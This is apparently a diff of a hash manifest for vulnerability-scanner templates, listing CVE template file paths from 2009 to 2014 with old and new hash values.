http/cves/2009/CVE-2009-2015.yaml:4694ca53378e410392946e729b2526d1220db192 -http/cves/2009/CVE-2009-2100.yaml:45f55b4220a293129398ebaacec8345254b6e9ec +http/cves/2009/CVE-2009-2100.yaml:b1fed3abb29407f88d6faee5eba8919065b58874 http/cves/2009/CVE-2009-3053.yaml:68a597a8292c709a6f9490f4ff1fc4e75c1ef815 -http/cves/2009/CVE-2009-3318.yaml:650f806f026a5876bb83df1d3fa76d375e8033bd -http/cves/2009/CVE-2009-4202.yaml:fa1b0e24f4e056b30fb316e0fced751c87b413fd -http/cves/2009/CVE-2009-4223.yaml:1813fcf1434639a69894d696ca8562f5e5cea2a9 +http/cves/2009/CVE-2009-3318.yaml:974fd4cc88e3f89735bafc6002390f5951f84c75 +http/cves/2009/CVE-2009-4202.yaml:794900a596204e22965ff4ca20cb2c5281288aac +http/cves/2009/CVE-2009-4223.yaml:a8a1c50ee7caece6f3a124b4f9fcbcbfca624f3d http/cves/2009/CVE-2009-4679.yaml:6fc53e452071d62d54f1e77aeb36669cdab21df2 -http/cves/2009/CVE-2009-5020.yaml:96845c1d22cf83253333774c07e1be2416e91aa9 +http/cves/2009/CVE-2009-5020.yaml:85051897dc73a81c97e10972db632f719a4918ee http/cves/2009/CVE-2009-5114.yaml:eed033fbf16521f4aba9fe6fddbef642c202a00b -http/cves/2010/CVE-2010-0157.yaml:de5dd65be12fda192cfc3377c1db88cba1a8769c -http/cves/2010/CVE-2010-0219.yaml:ab25bf6c964e3fb73a7baf0124ce1de5e713fc85 -http/cves/2010/CVE-2010-0467.yaml:9b0c2b93a75e379ea975ccfea25ba2135f158c10 +http/cves/2010/CVE-2010-0157.yaml:ddef4fd4d27ec89abf52e89afd1238ebd8a9e8ac +http/cves/2010/CVE-2010-0219.yaml:97add297545c388a3f87790ff2daeaba38a84d08 +http/cves/2010/CVE-2010-0467.yaml:cbfe420f6148c4e7ec69d81ef7f9dccdaa2b8fd4 http/cves/2010/CVE-2010-0696.yaml:73259ec73f220808622802ae226874d03de4a439 -http/cves/2010/CVE-2010-0759.yaml:fc6b9f9554e34a7f856201b8e6b771e0644c2df0 -http/cves/2010/CVE-2010-0942.yaml:c03ababc0fb50eb537af53ddd9c3ce36d24d8985 +http/cves/2010/CVE-2010-0759.yaml:d4efd62acda03f88acdff771a23e105c57da5620 +http/cves/2010/CVE-2010-0942.yaml:c2153bdc250c5cd2ce90325ce50096ad8b6521e1 http/cves/2010/CVE-2010-0943.yaml:d1fe9d2b4e08d5ea81e894c03d11b7bcbdb73bb3 http/cves/2010/CVE-2010-0944.yaml:bfaf0faec2899ff4a64cb1a41b4229d73fbfd6a6 -http/cves/2010/CVE-2010-0972.yaml:c6ce2d613f49edaf02335b7128b23a718870094d +http/cves/2010/CVE-2010-0972.yaml:ddeb56e99bae15412ee93ee1cca6c3f43f2abba3 http/cves/2010/CVE-2010-0982.yaml:599bb1fb381fde5c20d5bcbcce1d55ba75512a52 http/cves/2010/CVE-2010-0985.yaml:ea6f8ee446653031d0a1f2ee0295e337a7f115d8 http/cves/2010/CVE-2010-1056.yaml:900582497ec305ba4fca6320cfc58b4975b3d751 -http/cves/2010/CVE-2010-1081.yaml:248dcbecd5d3e14c19f788462fe63831548f8c75 +http/cves/2010/CVE-2010-1081.yaml:a9e63d0147ea276e4ef9b2fc035a96af99dac28f http/cves/2010/CVE-2010-1217.yaml:65a2add18d495fa4aee30dc5d70bb31a6fc9a437 http/cves/2010/CVE-2010-1219.yaml:f22b61d9fdc94d2e0611638f8adc881eee8481a9 http/cves/2010/CVE-2010-1302.yaml:6ad059078eeb8d7f3bfd2aec5e71cdd7ae6f3891 http/cves/2010/CVE-2010-1304.yaml:727f1f1679c1f1973b09e11ad131f2cbb15e7dea -http/cves/2010/CVE-2010-1305.yaml:8e3fcbe24aa15170de7c85195637d213789a4d23 -http/cves/2010/CVE-2010-1306.yaml:1b5bd4af740cd2ea4d0f36300271a2ab28b24b1f -http/cves/2010/CVE-2010-1307.yaml:9d81d0f127ff48ea3c3f19d6e94bffdfed62e15c -http/cves/2010/CVE-2010-1308.yaml:9e9471063cbe144d48e9afbb99648a7838e318f2 -http/cves/2010/CVE-2010-1312.yaml:4144b0a0734f543ab60e3f8377e4eedb7a9dd3f6 -http/cves/2010/CVE-2010-1313.yaml:74d22dac4d378d3aa418463fd1b79a7285af52fc +http/cves/2010/CVE-2010-1305.yaml:2472be1c930d25b8ef09c04e9c0076ebdb6d3afe +http/cves/2010/CVE-2010-1306.yaml:302da19a1fa904a48cc109489628bcf1e3cb8721 +http/cves/2010/CVE-2010-1307.yaml:02c9440193acd85e94668ffbee5575c39f8483c7 +http/cves/2010/CVE-2010-1308.yaml:9f7f075061788b48cbf34a6bba23db64c2d2b45c +http/cves/2010/CVE-2010-1312.yaml:e060422c65a7d67a4e5bc1ea24c2a132fb2ffae6 +http/cves/2010/CVE-2010-1313.yaml:83220cba68d0bd8f0cb7400811a70ce5d08d70a2 http/cves/2010/CVE-2010-1314.yaml:e68e08b08120bd8612c9376f8b4a8f4562aa76ee http/cves/2010/CVE-2010-1315.yaml:8ae5fb46079488101b9c5e99a775d0f97dc98883 http/cves/2010/CVE-2010-1340.yaml:0c5648a4d0daa4d1915c4403fe656fa83bcc1ccd http/cves/2010/CVE-2010-1345.yaml:4e2d3d3329776cf5b14080ac31bee840bdd22646 http/cves/2010/CVE-2010-1352.yaml:0f001c6956c9fc5d200417b838d6a39fc23e353d -http/cves/2010/CVE-2010-1353.yaml:a082865fe732fb2cb763550ce58012db6e174ce4 -http/cves/2010/CVE-2010-1354.yaml:3815e3efd12eab17741d0018c5df7da435d95590 -http/cves/2010/CVE-2010-1429.yaml:7721907b63b852008f530318ea7204e84dc9a576 -http/cves/2010/CVE-2010-1461.yaml:4e5e50242fec4d8fb4e64039a91462a9e4d95ed6 -http/cves/2010/CVE-2010-1469.yaml:17292f4c744874b7c575553ffc357f9c5c3c6e26 +http/cves/2010/CVE-2010-1353.yaml:3e4b4d4ed60e0e4cab2c21797d8ae9884540408d +http/cves/2010/CVE-2010-1354.yaml:a8e32d056c74334fc86f716aa7a50515618fdf94 +http/cves/2010/CVE-2010-1429.yaml:36032d4688e465e068d6acb3916cbe87d982d72d +http/cves/2010/CVE-2010-1461.yaml:66ff1d52ed49414279f38a9ef66e21397033c681 +http/cves/2010/CVE-2010-1469.yaml:c4496478b863beaf50ec065b2d7251449346eadd http/cves/2010/CVE-2010-1470.yaml:425cbc7cf9331292bc877c74171918b9b26233ed -http/cves/2010/CVE-2010-1471.yaml:57a7c5deaae55f0d62c258b62d311c38f5a9077b +http/cves/2010/CVE-2010-1471.yaml:5933d9fc11464aff303d9e3a6026416f3e893e9e http/cves/2010/CVE-2010-1472.yaml:05efa0d65dfd726f7800598f8a7d6f69bdf2ac28 -http/cves/2010/CVE-2010-1473.yaml:66c189290d58a22b9c03499bccaffdd2c27be30c -http/cves/2010/CVE-2010-1474.yaml:8205d235b154fd23280ed3cde0a616a68f09e76e +http/cves/2010/CVE-2010-1473.yaml:e322a26eadc2fc402fb215602159fea2821345bb +http/cves/2010/CVE-2010-1474.yaml:d5770393c9bf13d7b60aec65acaab2417ad19e63 http/cves/2010/CVE-2010-1475.yaml:ba1533465a3c2032e7bbe8babc2aa2e33279217a -http/cves/2010/CVE-2010-1476.yaml:9da8b39c0197494de8a6b7540d82dbc24a3c7e9b +http/cves/2010/CVE-2010-1476.yaml:cb4315adfa0bde7ffd51d2a3e6de28bb6c11ec21 http/cves/2010/CVE-2010-1478.yaml:30788df9e30a86e49a95dbe857ba7d6f88895b35 http/cves/2010/CVE-2010-1491.yaml:81c825592c5b5b85645945be1cd9d88c4f88df9d -http/cves/2010/CVE-2010-1494.yaml:64792acd64a2aa81243bd437da329f4a6dc1eadd +http/cves/2010/CVE-2010-1494.yaml:28b3a504c10ea35e84a8e5ab55d46b96d1068ed2 http/cves/2010/CVE-2010-1495.yaml:fd08efd24fe096d136458eebabaf285744e07e0a http/cves/2010/CVE-2010-1531.yaml:37431ef4763a68b3568e8a486d81cf5e1643d80a -http/cves/2010/CVE-2010-1532.yaml:7b359d1801b34fad27c6ad13948879977d96098d -http/cves/2010/CVE-2010-1533.yaml:75edd02d0f324dcb1648a83455210233850ea9b3 -http/cves/2010/CVE-2010-1534.yaml:c3990a0a0c5872fcff919eabff42ad8613bd00c2 -http/cves/2010/CVE-2010-1535.yaml:8a0f96e71a76ed67044f3416796ea56a10b752c3 +http/cves/2010/CVE-2010-1532.yaml:438cdd173e4a31325ea27aea246aab2c4c34c14e +http/cves/2010/CVE-2010-1533.yaml:cbc6ad1e85e13bc8cb630ab2c364643d413fa0af +http/cves/2010/CVE-2010-1534.yaml:03dbcea8eaffe21f469180d5993ee5afbdbacfa7 +http/cves/2010/CVE-2010-1535.yaml:80d65e19fc2ed303d5cc8adb820232f44893202b http/cves/2010/CVE-2010-1540.yaml:eaf66df28d06a8f26b2c99f262d92b1340a42b16 http/cves/2010/CVE-2010-1586.yaml:d58c94874f5a6501a136f572f673c8b805d8ae9b http/cves/2010/CVE-2010-1601.yaml:b4aafeb36e3e33aeb3edd3b955b4953db25705ea -http/cves/2010/CVE-2010-1602.yaml:234f0b08d3f9e18b36ae71130989ee706fe93c86 +http/cves/2010/CVE-2010-1602.yaml:cca603ccbfdc146605d757fabdf6a1aa6e37cfed http/cves/2010/CVE-2010-1603.yaml:b6188b9d88e5d2351979796ebb3270d3fde53be9 -http/cves/2010/CVE-2010-1607.yaml:a6f048c12f817242d34af200f8aa3725995e4009 -http/cves/2010/CVE-2010-1653.yaml:5b03c1d17662a42748f48390006affe1c54a85c8 -http/cves/2010/CVE-2010-1657.yaml:6bc17590c2f06b9f939def217dac747f3566f852 +http/cves/2010/CVE-2010-1607.yaml:220efc2f1c0b9f145d04ec1cc0efc479157838d7 +http/cves/2010/CVE-2010-1653.yaml:6750c406d14955dd9e2c8feeb78178f3f0076547 +http/cves/2010/CVE-2010-1657.yaml:73d665d3d27f4bf152014ec82f56028e16f16abf http/cves/2010/CVE-2010-1658.yaml:7822fc55851a3db8a17932d981cd1249270a1fcd -http/cves/2010/CVE-2010-1659.yaml:8b9aa1882b3086f27d6ecfe9ca81568a2544c287 +http/cves/2010/CVE-2010-1659.yaml:f6b62072548aa907fa67787167cbb82d9d763324 http/cves/2010/CVE-2010-1714.yaml:b9fc204e8b85ee36b0f15a8da385448b2dd2fbce -http/cves/2010/CVE-2010-1715.yaml:4d975c9a6c4c5806bee7616932b4c0dc190211bb +http/cves/2010/CVE-2010-1715.yaml:daed63a42610d953dad924ab3139fcc62044d756 http/cves/2010/CVE-2010-1717.yaml:ccf1a65be89b0c388cc9f71c28d0d6b51a17b743 -http/cves/2010/CVE-2010-1718.yaml:ffce1b902c947a357f4fe9c7f3bd2d364ed3df3b +http/cves/2010/CVE-2010-1718.yaml:aa32181a904283d0e32744973e5b8be429273193 http/cves/2010/CVE-2010-1719.yaml:81f15e4304779eb24cba200b01099889e5140a74 http/cves/2010/CVE-2010-1722.yaml:75137a1adbb8ebcbb47642b983d93983a3f276c9 -http/cves/2010/CVE-2010-1723.yaml:c2378ea53b5434391f1a786f333ca9b185b34780 +http/cves/2010/CVE-2010-1723.yaml:45f2313b13af972e214edd03a86ef58149328b1a http/cves/2010/CVE-2010-1858.yaml:47fdeb1cfc6c33db3a6fbc3b6f841e5738c5524d -http/cves/2010/CVE-2010-1870.yaml:77e6d281e9eb5cf1d6305ee6c033acd2da1e553f +http/cves/2010/CVE-2010-1870.yaml:321316a994f71a408dc53de7fbc83f07b47c3714 http/cves/2010/CVE-2010-1875.yaml:153037344f618b22315b5cb6c764f56e6020e115 http/cves/2010/CVE-2010-1878.yaml:e376a84dae26f6d3b0cce191c22e273523736ed2 -http/cves/2010/CVE-2010-1952.yaml:a788fb53eac46d8bad34af96542981bb72a1a4f0 -http/cves/2010/CVE-2010-1953.yaml:96afcdb36a574204721283a261502982c7e75bd0 +http/cves/2010/CVE-2010-1952.yaml:4e23bfee74560418ea78ed1fa6bbd3d164d86e14 +http/cves/2010/CVE-2010-1953.yaml:92593bf4c6168db596ce32760588f97b76add554 http/cves/2010/CVE-2010-1954.yaml:7935cf23b4feb5d1cd7668642ff36fa87c41a759 -http/cves/2010/CVE-2010-1955.yaml:05f2076ebe2e4f8faa1d8c190f98bc27de31f64f -http/cves/2010/CVE-2010-1956.yaml:ee14e3a8c2698899dfda1080857625acbf6862b4 -http/cves/2010/CVE-2010-1957.yaml:ca5a15b18aee163794525357489a0cb944e233a8 -http/cves/2010/CVE-2010-1977.yaml:77d3ebab90390df136d8474a5e6ecbbf54b6e5db +http/cves/2010/CVE-2010-1955.yaml:cee09885c3fe1dea578218c5b63469f2fd3cd905 +http/cves/2010/CVE-2010-1956.yaml:9cae094ac7f90ea7c74afd1ac7f6ca72cb26ad44 +http/cves/2010/CVE-2010-1957.yaml:f3d0975a0cd41bcbdc55fc95cad0f3a92a7b05c6 +http/cves/2010/CVE-2010-1977.yaml:323af1f37f4bafc02c35680b3b5f25c65dc1012e http/cves/2010/CVE-2010-1979.yaml:0ddddf83b9d40873443db4a31de2ebedbdc1a8bc http/cves/2010/CVE-2010-1980.yaml:d46da5ed40593b05c99310de3c3cf02b596f785c http/cves/2010/CVE-2010-1981.yaml:b1c467846895e76100a2ce986bbd364c7ef11875 -http/cves/2010/CVE-2010-1982.yaml:387182b3a10dff830c6bd1995fdeb5154f2404e0 +http/cves/2010/CVE-2010-1982.yaml:ba5aa35d9543a73569b8db46278243d8b818463b http/cves/2010/CVE-2010-1983.yaml:d8d03db95a52020abedb493b3f4cd0050c166b3b http/cves/2010/CVE-2010-2033.yaml:6897fa1eb808a4ad1dd8f1980c3128050da1a9c6 http/cves/2010/CVE-2010-2034.yaml:ed205dcf43b360b3b9380b59380607610c6db446 http/cves/2010/CVE-2010-2035.yaml:343a15271ba30a258277c2d62a2ac0b32eae4a7a -http/cves/2010/CVE-2010-2036.yaml:61bf5931b710a0ccc0d1d8bb878f73a096f0482c -http/cves/2010/CVE-2010-2037.yaml:4c6d577dc6e0754cfed93cd62cc00cd0353307e7 +http/cves/2010/CVE-2010-2036.yaml:987ff41eb17287615f545e61109562af0e4e11ac +http/cves/2010/CVE-2010-2037.yaml:9cb8477ccf1880daf9122b815722304234537b39 http/cves/2010/CVE-2010-2045.yaml:da2b1830c10d0a89cc941fe7c6b0eec0164efe12 -http/cves/2010/CVE-2010-2050.yaml:6ce407f0e35ff5ec6b553a23263175b01f9fdfe0 +http/cves/2010/CVE-2010-2050.yaml:0769276e076f4cfd3fa7d1a3ff7ceaa339828ca6 http/cves/2010/CVE-2010-2122.yaml:3e2a4991e90707a57e0770920aa0f55a12b5efc5 http/cves/2010/CVE-2010-2128.yaml:7e08cbdba6e319549864dcd168316626d1fec1a5 http/cves/2010/CVE-2010-2259.yaml:7ee9cb7d015a35ae5db7d2b21dc21eee66b1335f http/cves/2010/CVE-2010-2307.yaml:974a029d715d0b35c48ae0152129a4eb67bc72c5 -http/cves/2010/CVE-2010-2507.yaml:c85d135f7474bc57e60169d52f3355708dd4600e -http/cves/2010/CVE-2010-2680.yaml:b157df1fb12dfad3450ae14b5c8092466e5817bb +http/cves/2010/CVE-2010-2507.yaml:374cf4047e37632490fbdfc825fce2eb1b5c7e58 +http/cves/2010/CVE-2010-2680.yaml:8a3e803dff818279452703ce45b1ceb5b0d7a328 http/cves/2010/CVE-2010-2682.yaml:55d668ece64b7ec7b966b2979e89092420f94fa2 http/cves/2010/CVE-2010-2857.yaml:2e5ec92cf7a36d86f01ff057ec26939b1877a8d5 -http/cves/2010/CVE-2010-2861.yaml:f65f66c238e655bf561b998f84c651fc8164d124 -http/cves/2010/CVE-2010-2918.yaml:7fcaac6f3a9baca1ecb1b8cb70cf1abfd8a27440 +http/cves/2010/CVE-2010-2861.yaml:649c467d63ee9eeb2a84cd5c4be98baf86ccaf27 +http/cves/2010/CVE-2010-2918.yaml:0d785499476f3aba502f9a5d40039f9d38d01330 http/cves/2010/CVE-2010-2920.yaml:f32fc44594b039fd382f339f9ac42d0d9858a60b -http/cves/2010/CVE-2010-3203.yaml:d5d08e415f5daeb29e2650d9a57c3c29922e4b8a +http/cves/2010/CVE-2010-3203.yaml:e9aafd881e5ed1c311f7960188aaade5eff50e12 http/cves/2010/CVE-2010-3426.yaml:8fbd7d692e79dc4e64334f330432896ca80e1e8a -http/cves/2010/CVE-2010-4231.yaml:c58a93471fd959552d49733b23c921347365d958 -http/cves/2010/CVE-2010-4239.yaml:d2cfcdbb7375c86d15942a8eeb9a75d021de6151 -http/cves/2010/CVE-2010-4282.yaml:6cb02784d063779c1a36562e21574e0e72c51b90 +http/cves/2010/CVE-2010-4231.yaml:51bdd2463b062dd515ebd1cd667897d559732db7 +http/cves/2010/CVE-2010-4239.yaml:c4050ca6a9a1ba60621e66783f85213759b64d96 +http/cves/2010/CVE-2010-4282.yaml:a6a60700c9e220d86947b9b5bf65cedc3839e03a http/cves/2010/CVE-2010-4617.yaml:890b0e647d804ad358fdfd64173d51fbbf168ef1 http/cves/2010/CVE-2010-4719.yaml:6c0dc775334d3f436a198b83d84a98acf172da6a http/cves/2010/CVE-2010-4769.yaml:d677d549a83a06d3a26b105a7f9d42161b491ca4 -http/cves/2010/CVE-2010-4977.yaml:99e4d5e11603cfb88ec21eb96babf8b35e51531d -http/cves/2010/CVE-2010-5028.yaml:c99b46a20d28f765e23fe32dd3cf9084abd7a167 -http/cves/2010/CVE-2010-5278.yaml:a2469407db620267c9d502b9eb3f986ba4c6cec7 -http/cves/2010/CVE-2010-5286.yaml:4ab8a558033c667ae000d9e86c970511daf6ad9e -http/cves/2011/CVE-2011-0049.yaml:04cb75dee17a3973d8f1a37e5332a15560c93ebd +http/cves/2010/CVE-2010-4977.yaml:9e5b7253a99c393814e0f3cfbd27992dfa336274 +http/cves/2010/CVE-2010-5028.yaml:0ffbc4395e4046ada43652a0e0fa672cdad14a7c +http/cves/2010/CVE-2010-5278.yaml:8a60614e73e0cf3b1ffbb76269b13b7921535de6 +http/cves/2010/CVE-2010-5286.yaml:ccf9698bf9602866e9d6b800f766c5a9c893ebb9 +http/cves/2011/CVE-2011-0049.yaml:a13d91484a5b80a35520ea575a0c4032deb34b57 http/cves/2011/CVE-2011-1669.yaml:b790ebc1bb9519722ffd34b342f8d4eca798ecb2 -http/cves/2011/CVE-2011-2744.yaml:c6cd48497ee1ba7c577026b4fa4d43538ad44f7f -http/cves/2011/CVE-2011-2780.yaml:efa6b4f9427ef93a04ac2f27bdb9a0fd2e1172c2 +http/cves/2011/CVE-2011-2744.yaml:03ab85cc38bad602f3bae9309d6d9e94a3ef8ca6 +http/cves/2011/CVE-2011-2780.yaml:509b32f8c34ec3ac54c7f5d68eca51c8d420f68f http/cves/2011/CVE-2011-3315.yaml:a0377daef14d191981a0f569ca9c7d5816b34809 -http/cves/2011/CVE-2011-4336.yaml:0050da7eb1e0feb9f4448425303adfd4e5d2f874 +http/cves/2011/CVE-2011-4336.yaml:304c44d51a1936102439ea5d3b93753c3048e0ae http/cves/2011/CVE-2011-4618.yaml:43b9dc16cda0cbffcc4ee7b6bfb7390ef291deae http/cves/2011/CVE-2011-4624.yaml:67aec04578dce4d171c7e6a30f6101a4f35537d8 -http/cves/2011/CVE-2011-4640.yaml:e241d8dd7d51e250ff275201546f53c895b22cdd -http/cves/2011/CVE-2011-4804.yaml:37900867edbff4dab45640ea03c99ddd32d3294e -http/cves/2011/CVE-2011-4926.yaml:45bf96a5711d629cd72c7195188deeb6e60429ec -http/cves/2011/CVE-2011-5106.yaml:55198a97f63787823655ca77a3a8975fb10927ff +http/cves/2011/CVE-2011-4640.yaml:a420fc3b17a88aa376e17b9aeeececfcb7a85698 +http/cves/2011/CVE-2011-4804.yaml:b834bce15f99648a9aa69e020e115d9d1743ef0f +http/cves/2011/CVE-2011-4926.yaml:07d0e425cd96d336ea822358a49ff41821a63c3d +http/cves/2011/CVE-2011-5106.yaml:2f518834abd8cddb17b5116bb85f009ddf8cddc2 http/cves/2011/CVE-2011-5107.yaml:6500479dea5a2baa7dda98cf15ac603c80dd88ee http/cves/2011/CVE-2011-5179.yaml:6b1bc0308f5843e6e8214c7689ed7ce2cdd3d067 -http/cves/2011/CVE-2011-5181.yaml:22c587383d3a5d17280ed51aa2116e679a8de4af +http/cves/2011/CVE-2011-5181.yaml:2c742ddf13d80ab9705095f5c04863acf5effc53 http/cves/2011/CVE-2011-5252.yaml:cd6677a2e68a410e579dca0dbfb4b0f6cdd87bee -http/cves/2011/CVE-2011-5265.yaml:fd97bcf2d116719875979e92822176690f3f4598 -http/cves/2012/CVE-2012-0392.yaml:ef81227c1f1e020828855ac0ecd11462bec25e56 -http/cves/2012/CVE-2012-0394.yaml:d655e6c35415f94d6a150d405fd672c9481b408c -http/cves/2012/CVE-2012-0896.yaml:f0ddaeaa9f60edb123404b144d6c9f324f50f571 -http/cves/2012/CVE-2012-0901.yaml:b63a1193885f92b47e5e3efb8dde76f4ad55a6c0 -http/cves/2012/CVE-2012-0981.yaml:60fe3af545af85bc25ab4fd527333593d3bdd45e -http/cves/2012/CVE-2012-0991.yaml:6066f351faa5e380c9624693e9909aa24b6aedac -http/cves/2012/CVE-2012-0996.yaml:b19ab38ebefec4aadd598937841d93b4d33f09ee -http/cves/2012/CVE-2012-1226.yaml:2c3128c37cb7cb9ba8ef97b9776c311191445a58 -http/cves/2012/CVE-2012-1823.yaml:0d3dd8a773dce48c30843ad44a58921844f7445b -http/cves/2012/CVE-2012-1835.yaml:a8e5a8464a31bace69bb1ad4d7af5fa733f76cd7 -http/cves/2012/CVE-2012-2371.yaml:cf289b04f6825c98b1648a45082759e50eafd7da -http/cves/2012/CVE-2012-3153.yaml:9632dbed943428a3ce82bd26243e96bb53e0101f +http/cves/2011/CVE-2011-5265.yaml:3629299c7ab9174df7d8588184536146bc4c9aaf +http/cves/2012/CVE-2012-0392.yaml:e4a19a213ec6890934b32339c1bc1a595f3c5f7e +http/cves/2012/CVE-2012-0394.yaml:3111ae42d043d8619a922208aaa998cae6f28b86 +http/cves/2012/CVE-2012-0896.yaml:6d15a7d9bc6d3be722d5d4ed979998577d8b9ed4 +http/cves/2012/CVE-2012-0901.yaml:cc4676f6b8f1025af8450441cc345d61d191097c +http/cves/2012/CVE-2012-0981.yaml:54410413b227a7979de56f35b31dc2e865f07676 +http/cves/2012/CVE-2012-0991.yaml:08d3cf09600f775ce531adf5e966547525d8b4dc +http/cves/2012/CVE-2012-0996.yaml:84b125282e0096629de4adacc5b9b6e1db7234f3 +http/cves/2012/CVE-2012-1226.yaml:b9aefa26324f852d4d716dbb330845b0d557b935 +http/cves/2012/CVE-2012-1823.yaml:1bc5e1ca0c4b8fbd5170219da23eaacbbd4f5bac +http/cves/2012/CVE-2012-1835.yaml:9ef03cd62c044d41781e930a335d6ea02ebc71dd +http/cves/2012/CVE-2012-2371.yaml:d35fa4dae38879bc87e8c1927beb360c6ca07940 +http/cves/2012/CVE-2012-3153.yaml:4f5f8dd92c3bb79b73f5e096b157fa434d06dade http/cves/2012/CVE-2012-4032.yaml:c433e79a48badc5d9996e22bcd1939ee98401e92 -http/cves/2012/CVE-2012-4242.yaml:22a2db1e049674ce9a241cddca724d6df164a778 +http/cves/2012/CVE-2012-4242.yaml:5702dfb9eb0dc70a806354645d5581b711c44aff http/cves/2012/CVE-2012-4253.yaml:b751e39074389ddfe21a53c9639721af4366933d -http/cves/2012/CVE-2012-4273.yaml:a86195478013f40687e1e95d0404d686d5577af6 -http/cves/2012/CVE-2012-4547.yaml:d254026e048515763754a600a75aab80318b79f5 -http/cves/2012/CVE-2012-4768.yaml:47e9b04288e737da4feb04b2bfa518d08b5ff09b -http/cves/2012/CVE-2012-4878.yaml:1a209a9e0f485e98ea538a5f12236e2fbd943052 -http/cves/2012/CVE-2012-4889.yaml:ca924bbd1d81d3e10dc6e12037c3190790781d1e +http/cves/2012/CVE-2012-4273.yaml:ea232cd1dac8f5f9395da88bf4af057aa5df281f +http/cves/2012/CVE-2012-4547.yaml:1a368b287bf2d7a5cf4e2a8bb2262c9947e345a8 +http/cves/2012/CVE-2012-4768.yaml:816e62117eca9cae9747d85abe513b4c74bb6245 +http/cves/2012/CVE-2012-4878.yaml:adab7b06d1898a824aeb36aedbb3e8ed3794be18 +http/cves/2012/CVE-2012-4889.yaml:5508ad452b4b356da8b934e6de9abc1deae05be4 http/cves/2012/CVE-2012-4940.yaml:0788c7af85578fd5462ba3646fe3a489281a3326 -http/cves/2012/CVE-2012-4982.yaml:febfde4d07a25592322c2273aa598ebb156525f7 -http/cves/2012/CVE-2012-5321.yaml:1d2130d5d440f060ae0ab94968d67eeac764a155 -http/cves/2012/CVE-2012-5913.yaml:a777549e2af1d5d8414457ed84acc26bc5c838cb -http/cves/2012/CVE-2012-6499.yaml:89fce19ebd266bc43de3fd9e017ae5756b7b8c06 -http/cves/2013/CVE-2013-1965.yaml:8b5e0f54c0092616feb89be8ae5f32bfe51b434d -http/cves/2013/CVE-2013-2248.yaml:4c5db1f1374578d914e941409be5132db85ccc7d -http/cves/2013/CVE-2013-2251.yaml:fb41a4a2a7d4bbec2f366b34906f06bcae1605e4 -http/cves/2013/CVE-2013-2287.yaml:fb4e1dd0a619cd3b36c09fa2afcba1ace40c254f +http/cves/2012/CVE-2012-4982.yaml:defe2c394ce76e59123751467989546fdedb477b +http/cves/2012/CVE-2012-5321.yaml:c3c959cd4139018f9dc6d83e0dd48e9ceb5d40cb +http/cves/2012/CVE-2012-5913.yaml:d1292669a7ac4def883f124182b062b202023751 +http/cves/2012/CVE-2012-6499.yaml:44bcad77ce9332946506dce70c593c7407df4982 +http/cves/2013/CVE-2013-1965.yaml:9f5ea4e2ede3e57a760b78bba35df5a25f97b096 +http/cves/2013/CVE-2013-2248.yaml:0f5c75886160f8c45398025d59c33a09cc7555ff +http/cves/2013/CVE-2013-2251.yaml:6451e30038014299e998aa93b46bd63d7b6cef90 +http/cves/2013/CVE-2013-2287.yaml:740ca6d675d5d036e8bb8c442b401f100cd192e1 http/cves/2013/CVE-2013-2621.yaml:b119a307b339c8bdf9fd8de85ac33095943fe5bd -http/cves/2013/CVE-2013-3526.yaml:082084e34e544dd3f6522368383d322d3e8a1384 -http/cves/2013/CVE-2013-3827.yaml:62f9f666f26fca45a7b67fd8e25145dc654a31f9 -http/cves/2013/CVE-2013-4117.yaml:6f60e398938fd7bbea55bb00f26c870f2fc9a4ea -http/cves/2013/CVE-2013-4625.yaml:db3dbe786e631be329ce0f26e764a834f4b59fb9 +http/cves/2013/CVE-2013-3526.yaml:f1bb7a19ec36fb857d7b3e9e40c311b35b8dee10 +http/cves/2013/CVE-2013-3827.yaml:b455050804bef00178fe71c47df37e560c227d62 +http/cves/2013/CVE-2013-4117.yaml:e3af3d8b6e5aa118193d40d0111ce652f62807c3 +http/cves/2013/CVE-2013-4625.yaml:708eebdc6371b8866230b4dbfb68d3bf21b09d12 http/cves/2013/CVE-2013-5528.yaml:b9dd20d30e2aec7bf16c605678c6489ee1d01cea -http/cves/2013/CVE-2013-5979.yaml:c0ba55095893ddb99f67a7b586a22e464a3f1d8d -http/cves/2013/CVE-2013-6281.yaml:9b23501e16d627b3ad7f90298dc28808e1d10341 -http/cves/2013/CVE-2013-7091.yaml:a0b2b05ba87e52009e12c3e617191abadc48ae7a -http/cves/2013/CVE-2013-7240.yaml:9612922eb882db21c01194780dc87a54a606e7fc +http/cves/2013/CVE-2013-5979.yaml:827c8db3d7998dd30cd139dc39662de36bc7199d +http/cves/2013/CVE-2013-6281.yaml:43b0fc6630c8c1c343d4028c0408d9266c4d6025 +http/cves/2013/CVE-2013-7091.yaml:3edf95098b7b7bb53891943a708eddd26a2f5f26 +http/cves/2013/CVE-2013-7240.yaml:b4bd306b198efb89e46f6d280ea28dc091c9da7f http/cves/2013/CVE-2013-7285.yaml:b736c63de6a3a9021e2959f2758b08d4361d2dcd http/cves/2014/CVE-2014-10037.yaml:0ef395d3b049fc99af52a0d7ca44ee7d029b1048 -http/cves/2014/CVE-2014-1203.yaml:0506940edc8033338572826802c8c4b1c877a26e -http/cves/2014/CVE-2014-2321.yaml:ce9c932a5a0075092c059ff300acfdca25707c47 -http/cves/2014/CVE-2014-2323.yaml:db34b03d31565f04ef895024cceb9c94f4e34b87 -http/cves/2014/CVE-2014-2383.yaml:60182a283fc602cd74b0652577d114cc921837a7 -http/cves/2014/CVE-2014-2908.yaml:ba4bad2d7e97fd75e9cb049b5bc2175e4e274b8c -http/cves/2014/CVE-2014-2962.yaml:bda481d04555d454bbc3ecced9906fcaf12801c7 -http/cves/2014/CVE-2014-3120.yaml:3cf0983b299bbdf24b5f1ed3693a8cb0e69783ee +http/cves/2014/CVE-2014-1203.yaml:af8b996d5f9e2adcac4ac435e1654d25e613e918 +http/cves/2014/CVE-2014-2321.yaml:df3f2c107beedfa4774501d2ce5ce1d221fa4ebb +http/cves/2014/CVE-2014-2323.yaml:af8806fdc853257647a4aee490070ec3e11e10ee +http/cves/2014/CVE-2014-2383.yaml:c0890d0099e9e4c4423d441cba21b8da5bf5517f +http/cves/2014/CVE-2014-2908.yaml:34b60804ce981f9c823e9e19caca4e269ba43c8f +http/cves/2014/CVE-2014-2962.yaml:3a364924dde5e4bd3e97684264d29dcd87e502c4 +http/cves/2014/CVE-2014-3120.yaml:f50d3f474c4bb0dbd656c57a48ba61e849486e8c http/cves/2014/CVE-2014-3206.yaml:782be59b3bb32def79865444317569a446583b0a http/cves/2014/CVE-2014-3704.yaml:96b8f5c3d29e4a07cad9c4d0ac5c3f601cf655f0 